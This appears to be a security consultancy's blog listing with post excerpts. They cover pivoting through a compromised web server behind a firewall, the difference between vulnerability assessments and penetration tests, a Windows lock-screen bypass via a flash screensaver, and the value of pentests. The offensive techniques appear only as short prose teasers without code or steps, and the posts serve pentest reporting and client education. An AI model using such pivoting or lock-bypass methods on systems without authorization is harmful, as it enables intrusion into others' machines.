During a recent penetration test we have experienced the situation where we’ve gained remote code execution with limited privileges to a web server and had to pivot to other hosts from the internal network.
For this, we had to find a reliable method to forward our traffic from our local machine to the internal host via the compromised server. This blog post describes how we solved this situation – for future reference.
Our scenario is best described in the diagram below:
Achieving our goal was not that straight forward since the compromised server was behind a firewall and only ports 80 and 443 were permitted inbound. Furthermore, we were executing commands as www-data user and our non-interactive shell (PHP passthru) was pretty limited.
In this post we will take a quick look at the differences between vulnerability assessment (VA) and penetration testing (PT). Furthermore, we’ll give a set of questions that should help you decide which service is the best choice for your particular case.
So let’s say you want to improve the security of your internal network infrastructure and you have to choose between VA and PT – offered by your favorite consultancy firm. First of all, let’s see what they are.
Vulnerability Assessment – is the process of identifying and prioritizing technical vulnerabilities which affect a target system or network. It is mainly done automatically using a vulnerability scanner and it’s usually aimed at a wide area of machines. The purpose of a VA is to find as many vulnerabilities as possible in the given time frame. Optionally, manual validation may be included for the critical findings but this is not usually done when a high number of vulnerabilities are involved.
Penetration Testing – is a goal-based simulation of a real attack. The pentesters will search for a chain of vulnerabilities in the target system/network and exploit them to reach their target (e.g. gain access to a client database, obtain sensitive information, gain Domain Admin, etc). The pentest report will contain only the vulnerabilities encountered during the attack against the target and no additional checks are being made. However, the reported vulnerabilities are 100% validated and their risk for the business is accurate.
Neither VA, nor PT should be confused with the security audit which is a totally different service.
We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running.
The method allows an attacker to gain unauthorized access to a user’s Windows session if he has physical access to a locked machine.
When a user leaves his computer (ex. during a lunch break), he should lock his session in order to prevent other people from doing actions on his behalf.
Some computers, mostly in corporate environments, are configured to play a flash animation as screensaver while the computer is locked. This configuration is done by specifying the path to a .scr file – which is actually a renamed executable obtained by compiling a swf. The following registry key specifies the path to this executable: Continue reading
Penetration testing projects are definitely fun for the passionate pentesters.
However, the question is what are the real benefits of a pentest for the client company?
What is the real value of a penetration test?
Many clients have misconceptions and false assumptions about penetration testing and they are engaging this type of projects for the wrong reasons, like:
- After a penetration test I will be safe
- A penetration test will find all of my vulnerabilities
- I’ve heard that pentesting is ‘sexy’ so I would like one myself
Companies who do penetration tests for these reasons do not get the real benefits of this service and they are practically throwing away the money.
From my perspective, a penetration test has the following true benefits for the client company: